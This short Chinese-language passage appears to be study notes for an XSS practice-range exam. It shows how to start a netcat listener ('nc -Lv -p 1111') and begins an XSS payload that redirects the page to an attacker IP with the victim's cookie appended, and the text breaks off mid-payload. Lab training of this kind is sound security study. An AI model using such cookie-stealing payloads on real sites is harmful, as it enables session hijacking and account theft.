xss靶场里key最有可能在的位置就是cookie里。考试用到的工具NC。 首先找到转发工具的里nc.exe,双击后输入命令nc -Lv -p 1111 监听1111端口 这里如果用小写的l会在收到一次信息后闪退-p是指定端口,-v是输出详细信息 然后我们在靶场中存在xss的地方构造payload document.location='http://192.168.3.70:1111/?cook...